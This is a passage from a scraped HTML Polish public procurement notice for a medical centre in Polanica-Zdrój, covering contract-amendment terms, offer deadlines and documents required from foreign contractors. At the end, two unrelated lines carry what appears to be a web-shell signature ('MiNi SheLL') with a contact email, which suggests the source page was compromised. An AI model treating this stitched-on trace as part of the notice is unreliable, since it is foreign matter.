nie będą przysługiwać żadne roszczenia. Zamawiający zobowiązuje się do zrealizowania przedmiotu umowy w wysokości minimalnej 90% wartości brutto umowy określonej w § 3 ust. 1.<br/>d)	Zamawiający przewiduje zmianę umowy gdy nowy Wykonawca ma zastąpić dotychczasowego Wykonawcę w wyniku sukcesji, wstępując w prawa i obowiązki Wykonawcy, w następstwie przejęcia, połączenia, podziału, przekształcenia, upadłości, restrukturyzacji, dziedziczenia, lub nabycia dotychczasowego wykonawcy lub jego przedsiębiorstwa, o ile nowy Wykonawca spełnia warunki udziału w postępowaniu oraz nie pociąga to za sobą innych istotnych zmian umowy, a także nie ma na celu uniknięcia stosowania przepisów ustawy.<br/>3.4.	Zmiana umowy wymaga zachowania formy pisemnej, pod rygorem nieważności. Wprowadzanie do umowy innych zmian jest niedopuszczalne <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-04-29 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Specjalistyczne Centrum Medyczne im. św. Jana Pawła II SA, ul. Jana Pawła II nr 2, 57-320 Polanica-Zdrój</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-04-29 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 9. Wykonawcy mający siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej<br/>Polskiej9.1. Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza granicami<br/>Rzeczypospolitej Polskiej, składa:9.1.1. oświadczenia i dokumenty o których mowa w pkt.<br/>7.1.9.1.2. oświadczenie o którym mowa w pkt 7.2.1.9.1.3. ppkt 7.2.2 - składa dokument lub<br/>dokumenty wystawione w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania<br/>potwierdzające, że nie otwarto jego likwidacji, nie ogłoszono upadłości, jego aktywami nie<br/>zarządza likwidator lub sąd, nie zawarł układu z wierzycielami, jego działalność gospodarcza nie<br/>jest zawieszona ani nie znajduje się on w innej tego rodzaju sytuacji wynikającej z podobnej<br/>procedury przewidzianej w przepisach miejsca wszczęcia tej procedury

Creat By MiNi SheLL
Email: jattceo@gmail.com